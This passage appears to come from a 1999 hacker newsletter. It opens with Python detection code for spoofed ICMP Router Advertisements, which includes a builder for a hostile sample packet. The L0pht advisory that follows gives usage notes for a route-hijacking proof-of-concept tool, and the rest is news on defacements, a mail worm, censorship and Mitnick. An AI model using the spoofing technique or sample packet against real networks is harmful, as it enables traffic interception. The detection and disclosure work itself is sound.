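def build_router_advertisement(entries, lifetime: int = 1800) -> bytes:
    """Constructed test-input builder: emits a well-formed type 9 message."""
    body = struct.pack("!BBHBBH", ICMP_ROUTER_ADVERTISEMENT, 0, 0,
                       len(entries), 2, lifetime)           # addr entry size is 2 words
    for addr, pref in entries:
        body += ipaddress.IPv4Address(addr).packed + struct.pack("!i", pref)
    return body[:2] + struct.pack("!H", internet_checksum(body)) + body[4:]


def parse_router_advertisement(payload: bytes) -> RouterAdvertisement:
    """Parse and validate an ICMP Router Advertisement payload (ICMP header onward)."""
    if len(payload) < 8:
        raise ValueError("ICMP message too short")
    icmp_type, code, _csum, num, entry_size, lifetime = struct.unpack("!BBHBBH", payload[:8])
    if icmp_type != ICMP_ROUTER_ADVERTISEMENT or code != 0:
        raise ValueError("not a Router Advertisement")
    if entry_size != 2:
        raise ValueError("unsupported address entry size")
    if len(payload) < 8 + 8 * num:
        raise ValueError("truncated address entries")
    if internet_checksum(payload) != 0:
        raise ValueError("bad ICMP checksum")
    entries = []
    for i in range(num):
        off = 8 + 8 * i
        addr = ipaddress.IPv4Address(payload[off:off + 4])
        (pref,) = struct.unpack("!i", payload[off + 4:off + 8])  # signed; higher = more preferred
        entries.append((addr, pref))
    return RouterAdvertisement(lifetime, entries)


def win9x_default_routes(adv: RouterAdvertisement, ip_src, host_net):
    """Model of the section III rules for a DHCP-configured Win95/98 host:
    a single-entry advertisement is honoured only from an on-subnet source,
    a multi-entry advertisement is processed regardless of source, and only
    on-subnet router addresses are installed, with metric 1000 - preference."""
    src = ipaddress.IPv4Address(str(ip_src))
    net = ipaddress.IPv4Network(str(host_net))
    if len(adv.entries) == 1 and src not in net:
        return []
    return [(addr, IRDP_METRIC_BASE - pref) for addr, pref in adv.entries if addr in net]


def assess_advertisement(payload: bytes, ip_src, host_net) -> List[str]:
    """Detection logic: findings for one advertisement seen on the wire."""
    adv = parse_router_advertisement(payload)
    src = ipaddress.IPv4Address(str(ip_src))
    net = ipaddress.IPv4Network(str(host_net))
    findings = []
    if len(adv.entries) > 1 and src not in net:
        findings.append(f"multi-entry advertisement from off-subnet source {src} "
                        f"(anti-spoofing filter bypass pattern)")
    for addr, metric in win9x_default_routes(adv, src, net):
        if metric <= DHCP_DEFAULT_ROUTE_METRIC:
            findings.append(f"router {addr} would be installed with metric {metric}, "
                            f"overriding the DHCP default route (metric {DHCP_DEFAULT_ROUTE_METRIC})")
    return findings


HOST_NET = "192.168.1.0/24"  # constructed: the monitored host's subnet
# Constructed sample 1: a legitimate router on the LAN with preference 0 -> metric 1000.
BENIGN_ADV = build_router_advertisement([("192.168.1.1", 0)])
BENIGN_SRC = "192.168.1.1"
# Constructed sample 2: the pattern the advisory describes, a two-entry advertisement
# from an off-subnet source whose on-subnet entry carries preference 1000 -> metric 0.
HOSTILE_ADV = build_router_advertisement([("192.168.1.66", 1000), ("10.9.9.9", 0)], lifetime=65535)
HOSTILE_SRC = "10.9.9.9"

if __name__ == "__main__":
    for name, pkt, src in (("benign", BENIGN_ADV, BENIGN_SRC), ("hostile", HOSTILE_ADV, HOSTILE_SRC)):
        print(name, assess_advertisement(pkt, src, HOST_NET) or ["no findings"])
```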
The NFR module can be found at: http://www.l0pht.com/NFR
NFR information can be found at http://www.nfr.net

VI. Source Code
---------------

L0pht is making available Proof-of-Concept code that will let individuals test their systems & firewalls. The source code can be found at: http://www.l0pht.com/advisories/rdp.tar.gz

Usage is fairly straight forward:

Usage: rdp -v -l -s -d -p -t -i -S -D -R -r -v verbose -l listen mode -s send mode -d -n -I -p -t -i -S -D -R -r

Misc software notes:

Listen Mode: Software listens for ICMP Router Solicitations. If the '-s' flag is specified as well, the software will answer the Solicitations with ICMP Router Advertisements.

Preference: If the preference is not specified, it will use a default of 1000, which will give the default route a metric of 0 on affected Windows systems.

2nd Router Addr: By using the '-r' flag and specifying a second router address entry, the packet can contain a bogus source address and still be processed for correct gateway entries by the end host.

@HWA

19.0 More Government Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

The Federal Energy Regulatory Commission has had its web page defaced by someone known as 'Sarin'. FERC is a government agency that regulates the transmission and sale of oil, natural gas, electricity and regulates hydroelectric projects. The web page defacement called for the replacement of the administrator of the site. Also recently defaced was the U.S. Department of Commerce Institute for Telecommunication Sciences. This site was defaced by 'Pakistan Hackerz Club'; the page they left behind claimed to own America and threatened additional nuclear tests if Pakistan's internal affairs are interfered with.
HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2312517,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Another Fed Web site knocked out By Charles Cooper, ZDNN August 10, 1999 11:01 PM PT URL: The Web site for the Federal Energy Regulatory Commission was hacked Tuesday night. Instead of the usual bureaucratic greetings found on government Web sites, people attempting to access the page were met by a cartoon character of a female vamp holding a whip. The hack, which was claimed by "Sarin," also left a brief note, taunting administrators for leaving their site vulnerable to hacks after "widespread publicity" given to copycat attacks in the last several months. "I'd seriously consider hiring a new admin if I were you," Sarin wrote. It was unclear when the Web site went down, but in an e-mail to ZDNN at 7:56 PM Pacific Time, Sarin wrote, "Does anyone care I have complete control over the Federal Energy Regulatory Commission?" Attempts to reach Sarin for comment were not immediately successful. Hackers intent on teaching sloppy system administrators an embarrassing lesson have carried out attacks against numerous federal Web sites this year, most prominently those operated by NASA, the National Oceanic and Atmospheric Administration and the United States Army. This isn't a new phenomenon. Indeed, in a 1998 report, the U.S. General Accounting Office chastised many government agencies for leaving holes in their information security defenses. @HWA 20.0 Taiwan Strikes back at China via Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Albert In response to recent attacks on various Taiwan government web sites some Taiwanese individuals are attacking web sites in mainland China. 
Excite News http://news.excite.com/news/r/990810/08/net-china-hacker Taiwan Cyber-Hackers Strike Back At China Updated 8:38 AM ET August 10, 1999 TAIPEI (Reuters) - Taiwan may be dwarfed by its saber-rattling rival, mainland China, but it has shown it is not to be trifled with on at least one battleground -- cyberspace. Hackers from the computer-savvy island have inserted pro-Taiwan messages into several Communist Chinese government Web sites in retaliation for a similar attack on Taiwan government sites by a mainland Chinese hacker. The web attacks sparked concern from military authorities who said an Internet war could add to already simmering tension over Taiwan's drive for equal status with the mainland. Taiwan news media reported Tuesday that several local hackers had succeeded in inserting Taiwan's flag, a sound file that played its national anthem and pictures of Taiwan presidential candidates on mainland Chinese Web sites. Statements like "Counter the Chinese Communists," "Taiwan does not belong to China" and "Seriously, Taiwan is better" also popped up on some of the sites. The hackers from Taiwan, which makes many of the world's computers, were also believed responsible for a revolving image of the Japanese cartoon figure Hello Kitty on one Web site. The hackers struck after a weekend attack on official Taiwan sites by a person claiming to be from mainland China, who inserted messages such as "Only one China exists and only one China is needed." The mainland hacker was apparently angered by Taiwan President Lee Teng-hui's call for "special state-to-state" ties between Taiwan and China, something Beijing has furiously condemned and threatened to punish with military action. Beijing views Taiwan as a wayward province and vows to bring it under mainland rule. 
@HWA

21.0 Monopoly Virus Taunts Bill Gates and Microsoft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by nvirB

A new Melissa-like virus called VBS/Monopoly uses a picture of Bill Gates and a Monopoly board to taunt the giant company. The virus uses the Melissa-like tactic of sending itself to entries inside your address book but so far has not become widespread. It also sends a wide variety of information about the infected computer to numerous other email addresses.

MSNBC
http://www.msnbc.com/news/299142.asp

Monopoly virus taunts Microsoft
Another Melissa-like worm, this one could spread quickly but hasn’t yet been discovered in the wild
By Bob Sullivan
MSNBC

Aug. 10 — There’s a new Melissa-like computer virus that not only attacks Microsoft software, it taunts the software giant’s leader. The so-called VBS/Monopoly virus pops up a dialog box that says, “Bill Gates is guilty of monopoly. Here is the proof. :-)” and then displays a picture of Gates superimposed on a Monopoly game board. It also sends itself to every e-mail in the victim’s address book. But anti-virus firms say the virus is not yet spreading widely around the Internet.

NOTICE OF THE VIRUS WAS apparently first posted by a Russian anti-virus lab, Kaspersky Labs AVP, on Monday. (Microsoft is a partner in MSNBC.) Like Melissa, it arrives to victims as an e-mail attachment to a note. The subject line on the e-mail is “Bill Gates joke.” But unlike Melissa, anti-virus companies have been alerted to it before it was able to spread, so it won’t likely have Melissa-like widespread impact. Users who don’t double-click on the attachment, which is named MONOPOLY.VBS, cannot be infected. The .vbs extension indicates that the program is written in Microsoft’s Visual Basic scripting language.
According to Dan Takata of Data Fellows, programs written with VBScript operate only under Windows 98 and Windows 2000 (unless Windows Scripting Host has been installed separately). Along with displaying the image of Gates, the worm/virus sends itself to every e-mail in the victim’s Outlook address book. It also collects information about the victim, including registered user name and organization, network computer name, country and area code, language, Windows version and Internet Explorer start page. It sends that information to a variety of e-mail addresses, probably to be accessed later by the virus author. But the virus has not been detected “in the wild,” according to anti-virus companies. “It’s still a zoo virus,” said Network Associates’ Tony Wells, meaning at the moment no victims have been identified, and the program has been confined to anti-virus laboratories. “We’re classifying it as a low risk.” Wells said Network Associates’ anti-virus products have been updated to protect customers from the virus. @HWA 22.0 FBI fingerprint database now online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by pigeon Officials in 15 states can now submit fingerprints to an online database to look for possible matches. The database, known as the Integrated Automated Fingerprint Identification System, which cost $640 million, contains the fingerprints of 34 million people. Searches now take two hours instead of 15 days. All 50 states will eventually be connected to this system. Nando Times http://www.nandotimes.com/technology/story/0,1643,80191-126589-888747-0,00.html FBI touts online fingerprint database Copyright © 1999 Nando Media Copyright © 1999 Associated Press From Time to Time: Nando's in-depth look at the 20th century. By VICKI SMITH CLARKSBURG, W.Va. (August 10, 1999 6:58 a.m. 
EDT http://www.nandotimes.com) - A $640 million electronic database of fingerprints will help police nationwide decide within two hours whether a suspect should be freed on bail or held in custody, FBI officials say. Instead of waiting more than 20 days for critical information, judges and law enforcement agencies in 15 states now can uncover a suspect's identity and criminal history before leaving the courthouse. All 50 states are expected to be connected within the next few years. The new Integrated Automated Fingerprint Identification System, which began operating July 28, was expected to be dedicated by FBI Director Louis Freeh on Wednesday at the FBI's Criminal Justice Information Services center in Clarksburg. It reduces to electronic data some 34 million fingerprint cards, the equivalent of 18 stacks as tall as New York's Empire State Building. It also slashes the wait for civil background checks from more than three months to just 24 hours, said James DeSarno, assistant director in charge of the Criminal Justice Information Services Division.

@HWA

23.0 45 Named as Enemies of the Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by deepquest

45 nations have been named Enemies of the Internet by Reporters Sans Frontieres (RSF). The report lists countries it claims have blocked, filtered or all-out banned sections of the Internet. Some of the countries mentioned in the report were Azerbaijan, Kazakhstan, Burma, China, Cuba, Iran, Iraq, Libya, North Korea, Saudi Arabia, Sudan, Syria, Tunisia and Vietnam.

Yahoo Asia News
http://asia.yahoo.com/headlines/100899/technology/934254300-134601.html

PARIS, FRANCE, 1999 AUG 9 (NB)
By Martyn Williams, Newsbytes. A new report by Reporters Sans Frontieres (RSF) has named 45 nations the group considers enemies of the Internet for the blocking and filtering or all-out banning the nations impose on Internet access. Of the 45 nations, RSF said 20 can be described as real enemies of the Internet for their actions. They are: the countries of Central Asia and the Caucasus (Azerbaijan, Kazakhstan, Kirghizia, Tajikistan, Turkmenistan and Uzbekistan), Belarus, Burma, China, Cuba, Iran, Iraq, Libya, North Korea, Saudi Arabia, Sierra Leone, Sudan, Syria, Tunisia and Vietnam.

Many of the 20 nations are singled out for restrictions that make all Internet users access the network through a single, state-run ISP. These nations include Belarus, the nations of Central Asia, Sudan and Tunisia. China was singled out for its close monitoring of Internet use despite the rapid pace with which Internet use is growing. RSF singled out the case of computer technician Lin Hai, who was jailed for supplying Chinese e-mail addresses to a US-based dissident site that publishes an e-mail newsletter critical of the government, and the June closure of 300 unlicensed cybercafes in Shanghai. The group also highlighted China's periodic blocking of the Websites of dissident organizations and international news organizations including BBC Online and New Century Net.

Other nations were taken to task for government-controlled filtering of the Internet which means, according to RSF, medical students in Iran are unable to access Websites dealing with anatomy and surfing via any of Saudi Arabia's private ISPs run through government filters that seek to maintain Islamic values. However, the situation is even worse in other countries. In Burma, said RSF, Internet access is via a state-run ISP and anyone who owns a computer must declare it to the government or face the possibility of a 15 jail sentence if the machine is discovered.
Restrictions in Vietnam mean all Internet use has to be approved by the government through permits from the interior ministry and access via state-run ISPs. Journalists working for an online newspaper in Sierra Leone have been attacked, said RSF, with two from the daily The Independent Observer being arrested in June after accusations that they were working with the foreign based online newspaper Ninjas. And citizens of Iraq, Libya, North Korea and Syria have no direct access to the Internet and even the official sites of the governments of these countries are maintained on servers overseas. In the case of Iraq, the few official servers are in Jordan while the North Korean news agency maintains its site from Tokyo. Concluding its report, RSF called on the governments of the 20 nations to abolish the state monopoly on Internet access, the obligation on citizens to register before obtaining access, censorship through the use of filters, to lift controls on e-mail and enable more privacy online and to call off Internet-related legal proceedings. It also called on Burma, China, Cuba, Kazakhstan, Saudi Arabia and Tajikistan to ratify and enforce the International Covenant on Civil and Political Rights, Article 19 of which stipulates that "everyone shall have the right (...) to receive and impart information and ideas of all kinds, regardless of frontiers (...)".

The covenant has been signed by a number of the 20 nations singled out in the report and RSF asked those countries to respect the contents of Article 19. Those countries include Azerbaijan, Belarus, Iran, Iraq, Kazakhstan, Kirghizia, Libya, North Korea, Uzbekistan, Sierra Leone, Sudan, Syria, Tunisia and Vietnam.

@HWA

24.0 Alliance Z3 Defaces Spanish Web Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lionel

Yesterday (Wednesday), a group known as 'Alliance Z3' defaced the Spanish presidency's web site and left comments critical of the government. A government spokesperson admitted that the site was broken into, and that the original page has been restored.

Yahoo News - French
http://www.yahoo.fr/actualite/19990811/multimedia/934372020-yaho193.110899.134747.html

25.0 Government has a Hard Time with Bureaucracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

A little intrigue, some misdirected government funds, just what has been going on with government network security anyway? FIDNet has been proposed but is now facing opposition, which looks very similar to what happened with the Defensewide Information Systems Security Program (DISSP) back in 1996. So what happened? Where did the money go? Then last year there was the Defensewide Information Assurance Program (DIAP) which also failed. Now FIDNet looks like it too will fail. Just what the hell is going on?
Network World Fusion - Registration May be Required (It's worth it though)
http://www.nwfusion.com/cgi-bin/go2.cgi?url=/news/1999/0802feat.html&uid=656d61696c
(I hate subscription services)

26.0 Law Not a Substitute for Good Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

Former federal prosecutor Mark Rasch says that while current cybercrime laws are extremely broad and could possibly be interpreted in such a way that makes most Internet users criminals, businesses should still invest heavily in network security.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2312779,00.html

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Never a cop when you need one
By David Raikow, Sm@rt Reseller
August 11, 1999 10:46 AM PT
URL: http://www.zdnet.com:80/zdnn/stories/news/0,4586,2312779,00.html

In his keynote address at the WebSec security conference on Tuesday, former federal prosecutor Mark Rasch outlined one more rationale for a robust and comprehensive corporate security policy. If you're not prepared to respond to a system intrusion entirely in-house, you may be even less ready to deal with the consequences of going to the authorities for help, he warned.

Rasch, who was responsible for the prosecution of Robert Morris and the investigations of Kevin Mitnick and the "Cuckoo's Egg" hackers, described a legal system struggling to keep up with new technology and failing. In an attempt to address threats real and perceived, Congress has passed extraordinarily broad cybercrime laws, giving prosecutors enormous discretion, Rasch claimed.

We're all felons

"We have enacted new statutes that make felons of us all," said Rasch. "If you've e-mailed your cousin from the office, you're probably a felon."
While law enforcement agencies aren't likely to bother with the average violation of corporate e-mail policy, their priorities are no more likely to match most users'. Most IS shops probably would hope to chase intruders off as quickly and quietly as possible while minimizing the damages. But the FBI, according to Rasch, is probably more interested in a high-profile conviction and may want to prolong an intrusion in order to collect evidence.

The legal impact of a security breach may fall even more heavily on corporations than on the guilty party. An intruder using a company's servers to strike at other machines, for example, could leave that company exposed to "downstream liability" in civil court. And certainly a solvent corporation will present a more attractive defendant in such cases than the average cracker, he said.

Rasch laid out a situation in which an employee had used corporate servers to acquire and distribute pirated software. The business, which had unknowingly been using some of this software, was potentially subject to millions of dollars in fines.

Law is a 'blunt instrument'

Rasch emphasized that it may be essential to notify the authorities after a breach, particularly as it may be required by law. Government agencies also have assets--subpoena powers, investigative resources--that may be necessary to adequately respond to an attack. The key is to have an established plan for addressing these concerns so that employees are not forced to make ad-hoc decisions in the heat of the moment, he said.

"Law is a blunt instrument to use against cybercrime," Rasch concluded. "You should know what you're doing before you try."

@HWA

27.0 Network-centric Warfare to be Used by Military
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

The San Jose Mercury News has an interesting interview with Vice Adm. Arthur K. Cebrowski, president of the Naval War College in Newport, R.I., on what he describes as network-centric warfare and how the armed forces are adapting to it.

San Jose Mercury News
http://www.sjmercury.com/svtech/news/indepth/docs/qa081199.htm

Posted at 10:29 p.m. PDT Tuesday, August 10, 1999

Armed forces are adapting to network-centric warfare

Vice Adm. Arthur K. Cebrowski, described as the U.S. Navy's computer guru, is president of the Naval War College in Newport, R.I., and instrumental in addressing military needs in the information age. Cebrowski outlined his ideas on network-centric warfare, which aims to link the Navy's resources -- from personnel to weapons -- through a computer network, Tuesday at the Naval Postgraduate School in Monterey. Prior to the speech, Cebrowski spoke with Mercury News Staff Writer Shashank Bengali. This is an edited transcript of their conversation:

Q - Where did the concept of network-centric warfare come from?

A - It is the military's response to the information age. We can have well-informed soldiers and sailors and marines out there in the field but operating according to military principles that help organize their behavior. Forces will self-synchronize themselves from the bottom up, attaining a degree of efficiency and effectiveness that hasn't been possible before.

Q - And you're able to coordinate forces over wide geographic areas as well?

A - Yes. Just as in the information age, technology has changed the importance of territory and geography, you find the same thing in the military enterprise. That's why you see so much these days about striking targets from widely dispersed forces. So network-centric warfare derives its power from well-informed but geographically dispersed forces that have a high degree of shared awareness.

Q - Do you think the military has lagged behind the rest of the world in implementing networking technology?

A - There's a famous old Roman saying that the military walks in step with society but several paces back. And part of that is because the military is responsible for securing the most fundamental interests of the state; that is, the security of the people. And consequently, it tends to be strategically risk-averse. So before the military will make a dramatic shift, it will look for some very good evidence. We believe that that evidence is not only at hand, but that it's obvious, and the military is making that adjustment.

Q - How much will you have to overhaul, or at least, shift, your personnel to accommodate these changes?

A - One of the things that happens when there's a shift as great as this is that different skills are valued in different ways. And what you're seeing is a revaluing upward of those personnel who have facility in information tech broadly, both on the communication and executing side. It's also true in information-gathering, or what we call the ``sensing'' side. This is not just in war fighting, but it extends to everything we do. The secretary of the Navy divides its concerns into three areas: how we live, how we work and how we fight. We've been vigorously applying it at all three of those levels.

Q - Give a few examples of how this has affected how you fight.

A - Well, we've spent a considerable amount of money on what we call the IT21 program, Information Technology for the 21st century. What it is, is high-quality information exchange capability that is in our combat ships. We use it for the exchange of vital warfare information. If you look at how the operations were run in Kosovo, we don't have high-level meetings anymore, what we have is high-level collaborations with people at dispersed locations. The IT21 program allows us to do that from ships at sea. At the tactical level, we share information to bring combat power to bear via very high-quality data links, and that's the system by which we commit weapons and move forces.

Q - How much has all this cost?

A - It's been expensive (more than $1 billion over the last few years). However, the return on the investment has been enormous. And of course we don't measure return on investment the way stockholders do, we measure it in terms of increased combat power, and that's become very obvious to us.

Q - What have been the changes in the third aspect, the way you live?

A - We have wonderful experiences from our sailors deployed around the world, gone from home for extended periods of time, and now they are connected to their families on a daily basis. You have mitigated the great sense of loneliness. And, in fact, we've found that the retention rates among our sailors who are deployed in this modern technological environment are in fact higher than in the ships where we haven't been able to implement that kind of environment yet.

Q - What kind of access do the sailors have to the technology?

A - A few years ago, we deployed our first ship that had the capability of sending e-mail. We were so excited about that, that we actually counted the number of e-mails sent, and the number grew into the thousands. The Enterprise battle group recently returned from a long deployment, and they stopped counting e-mails past 5 million. It's no longer considered a novelty, it's just a fact of life.

Q - How far along are you in implementing this across the Navy?

A - By the end of 2001, we will have implemented the Navy-Marine Corps intranet. By the end of 2003, all of the ships in the Navy will have a very robust IT capability.

Q - How did the previous system compare to what you're trying to put in now?

A - It's not even a matter of saying it was a system. What you really had was a collection of capabilities that lacked standardization, interoperability, capacity. For example, one of the great concerns in combat is what's euphemistically called ``friendly fire'' (when an armed force accidentally kills one of its own). Of course, we don't like friendly fire. And information technology in the form of modern tactical data links (is) one of the most important tools to suppressing friendly fire. That's just one of the places where in our studies and in our war games, we can see the payoffs of information technology.

Q - How much have things changed since the last all-out war in the Persian Gulf?

A - The Persian Gulf War, looking back, quite frankly looks quite a bit like the Stone Age. I was commanding the USS Midway, where we had two telephones with off-ship capability. And it's hard to imagine that today. Some of our aircraft carriers have a thousand seats (for communicating). The quality of planning can go up a great deal, and you can plan much faster. For example, to put together a plan for fleet movement, a major evolution would frequently take a day or two. Now that kind of planning is done in an hour or even less. It's no longer plan, then execute -- it's plan while executing.

Q - And the billion-dollar question: Are these systems ready for Y2K?

A - I don't think we'll have a hiccup in Y2K as far as military systems.

Contact Shashank Bengali at sbengali@sjmercury.com or (408) 920-5066.

@HWA

28.0 Gateway plans for Amiga
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by M1r0rB4lls

Gateway is finally doing something with the 47 Amiga patents it bought several years ago. They aren't planning on introducing a new PC but instead want to use the technology to create info appliances.

MSNBC
http://www.msnbc.com/news/299752.asp

Gateway to revive Amiga for information appliances
By Gary McWilliams
THE WALL STREET JOURNAL

Aug. 12 — Two years ago, PC maker Gateway Inc. acquired the rights to the personal-computer industry’s most famous cult product, the Amiga PC. The Amiga made its debut in 1985, and still has fans, partly as a result of a James Dean-like history: a rapid rise, then a tragic end.

GATEWAY PAID ABOUT $13 MILLION for 47 Amiga patents, including those for important multimedia techniques.
The San Diego PC maker’s original plan was to use the patents as a bargaining chip in royalty negotiations with other PC makers. “It was a treasure chest,” says Joe Torre, a former Amiga Inc. hardware engineer.

Now, Gateway is aiming to revive the Amiga in a bold move to set standards for the next era in computing. It quietly has set up and staffed a new Amiga Inc. subsidiary to cobble together low-cost “information appliances” for the Internet, based on Amiga technology, that can be linked like home-stereo components to add features.

“There’s a new computer revolution on the horizon that has to do with making computers a natural part of everyday life,” says James Collas, the Amiga unit’s president and a former Gateway executive. He says the unit will craft everything from digital-music players and game machines to wireless tablets that link to the Internet. Its first products could arrive early next year and be priced from about $100 for game players to $1,000 for PC servers.

Gateway will pit its tiny subsidiary against PC kingpins such as Microsoft Corp. and consumer-electronics companies such as Sony Corp. and Philips Electronics NV, which also are developing new-age information devices. Mr. Collas says Amiga will license its designs to consumer-electronics makers to promote technologies that can be embraced far beyond its parent.

It could use all the help he can muster. Early entrants in the computer-consumer electronics convergence market, such as WebTV, were gobbled up quickly by the giants (Microsoft bought WebTV). Even for a company with $7.5 billion in sales, the risks are high for Gateway. “It’s becoming a battle for the big boys,” says Sean Kaldor, a researcher at International Data Corp.

How much of the new Amiga will come from its past isn’t known. Mr. Collas has recruited designers from Amiga’s heyday along with software specialists from Silicon Graphics Inc. and Apple Computer Inc. Amiga, he says, will operate independently from its parent, and be free to strike its own agreements. Mr. Collas wouldn’t say if Gateway plans to spin off the subsidiary. A Gateway spokesman declined to comment.

Among the San Diego division’s first products will be a new Amiga PC that Mr. Collas says is aimed to bring Amiga PC software writers back into the fold. Next week, the company plans to release a new version of the Amiga operating system that provides access to the Internet.

The Amiga is nothing if not resilient. It first appeared 14 years ago as a spunky alternative to the IBM PC and Apple’s Macintosh. Graphics and film enthusiasts flocked to the machine because of its ability to handle video and sound. Commodore Electronics Ltd. sold five million of the low-cost machines before the company’s sudden demise. Even today, Hollywood animators and filmmakers still use the machines for generating special effects.

Amiga went into decline after Commodore filed for bankruptcy in 1994, and stopped making the machines. The first attempt to resurrect Amiga came in 1995, when German computer maker Escom AG acquired the Commodore patents in a bidding contest with Dell Computer Corp. But, like Commodore, Escom filed for bankruptcy a year later, and manufacturing was halted again. Amiga devotees became scavengers, scouring online bulletin boards for used machines and add-on parts. Indeed, there are dozens of tiny companies still living off the Amiga accessory market.

If the new Amiga ever catches on, it will be an Amiga in name only for some of the machine’s original devotees. Greg Scott, an Amiga fan who manages the computer systems for Archtech Inc., a computer firm in London, Ontario, says Gateway’s plan to develop the next-generation Amiga PC using the free Linux operating software has raised the hackles of fans of the old Amiga. “It’s nothing new,” he says.

Jason Compton, who owns an Amiga and once ran an online Amiga magazine, still believes nothing can match the original. “I’ve never seen a PC I’ve enjoyed more.” He says the Gateway plan does little more than resurrect the Amiga name. “As far as I can tell, there’s no connection” to the original technology, he says.

Mr. Collas says such qualms are missing the spirit of the old Amiga. It isn’t new technology that’s needed so much as an innovative blending of existing technologies, he insists. Just as the Amiga PC’s low cost and ease of use allowed owners to do multimedia work years ahead of the IBM PC, he says the new Amiga “will bring the information age to the common person.”

Copyright © 1999 Dow Jones & Company, Inc. All Rights Reserved.

@HWA

29.0 Mitnick Moved to County Jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by ryan

In a swiftly executed move Kevin Mitnick has been moved from the Metropolitan Detention Center - Los Angeles, to the San Bernardino County Jail. Unfortunately the SBC does not offer Kosher meals; since Kevin wishes to exercise his right to freedom of religion, he has not eaten since his transfer late Wednesday afternoon. The defense lawyers will file a motion with the court for Kevin's immediate return to MDC-L.A. The SBC does allow visitors as long as 24 hours notice is given.

FREE KEVIN
http://www.freekevin.com

@HWA

30.0 The problem with ISP's and security sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by CyberChrist

A simple email and a site disappears, maybe it was never there to begin with? ISPs with missing backbones, maybe they never had them? What is going on? Where have all the good security sites gone?
Buffer Overflow
http://www.hackernews.com/orig/buffero.html

Not found-- the problem with ISPs and security web sites

CyberChrist
cc@h0use.org
"Sapere Aude"

Over the last few months, there has been a rash of security-related web sites taken offline for a peculiar reason-- it seems that Internet Service Providers cave in to the demands of people objecting to the content of the site, or at times, the alleged content. Sites such as Packetstorm Security have been victims of people claiming that material posted on the web site is libelous, who then try to hold the service provider of the web site, such as the web hosting organization, for ransom by threatening them with lawsuits if they do not force the webmaster to change the content. Companies are more willing to just toss the offending site off of their servers and avoid any kind of threat of a lawsuit. However, this is not the way to deal with this problem, as there have been precedents set in American courts that deal specifically with these issues.

First, let's examine a bit how a "security expert" or a "hacker" is viewed by a typical ISP. Most ISPs have a service agreement, where one agrees to abide by their rules. These agreements often lay out what content is acceptable and not acceptable. Many of these ISPs forbid the posting of security information on their web servers, lumping "hacking" in with "pornography" and other perceived underground activities. This lumping of hacking with other, seedier activities is prevalent and is part of the problem. No matter what the credentials are of the person constructing the web site, no matter what his stated intentions are, and no matter how many disclaimers are posted on the site, web hosting companies and ISPs generally frown upon that kind of content.

So part of the problem is that ISPs and web hosting companies are generally undereducated about the entire hacker culture, their brains fattened by the massive FUD articles posted in the media. In their minds, security consultants==hackers=bad.

This leads to another problem-- there is always going to be someone out there that is jealous or mad about the content of another web site. The site may contain information such as "xyz said this and xyz is wrong and this is why." Sites such as these either start posting about each other, or worse, one webmaster just gets fed up with it and contacts someone that they feel can remedy the situation. Often this person forgets about the chain of command as far as reporting questionable material and goes straight for the throat by contacting the web site's upstream provider.

This is becoming an increasing problem, and the problem again lies in the fact that many of these fly-by-night web masters were not around during the infancy of the Internet (no, that does not mean that the infancy was when the web got started). There ARE rules of engagement and chains of command, and these have been outlined since the early 80s and perhaps beyond, both in the form of RFCs and tradition. The way that complaints used to be handled is roughly as follows:

- send email to the system administrator of the offending system, calmly explaining the situation and maybe offer some evidence as to how this is causing harm. This could be due to content or due to other activity coming from the site, such as port scanning. Attaching logs usually helps a lot.

- if you don't get a response in a reasonable amount of time, try re-sending the email. It may seem hard to believe, but sometimes mail gets lost.

- if there is still no response, try doing a 'whois' on their domain name, and then try contacting them via the information provided. Usually you get names and telephone numbers and addresses at this point.

- it is only when you have exhausted all of these measures and are getting no cooperation or hostile responses that you try to contact the upstream service provider. To find out who their upstream service provider is, try looking at the nameservers that are registered for the domain in the 'whois' command, or try doing a traceroute and seeing who they have their connection from.

This is really common sense more than anything. Common sense apparently has gone out the window in the point-and-click world of the 1990s.

The last part of the puzzle is what happens when these two uneducated sides get together to decide what to do about someone that seems to know more than they do. More often than not, what happens is the illogical, in that the offending party is tossed off the system or his upstream provider threatens to shut down the service. The cycle usually goes like this:

- siteA.com posts information that shows that information by lamerA is wrong. siteA.com pokes fun at him, generally ridicules him, and the cycle usually renews itself when lamerA says something else stupid (or publishes an idiotic book).

- lamerA feels stung by all these statements and usually responds with weak defenses. Finally, the whole thing becomes unbearable and, in the search of trying to get the activity to stop, he dashes to siteA.com's service provider and tells them that siteA.com has libelous material. lamerA threatens the service provider with a lawsuit or thereabouts.

- siteA.com's provider panics, as they do not wish to be sued for libel (awards for this are usually extravagant and ISPs barely break even as it is). So they either remove the site or forcibly remove the content and send stern rebukes to siteA.com's administrator/user.

There are a lot of problems with this cycle. Obviously the chain of command is broken. But more importantly, due to lack of education on the ISP's part, they are not aware that U.S. courts have decided that ISPs are NOT liable for the content of their users.

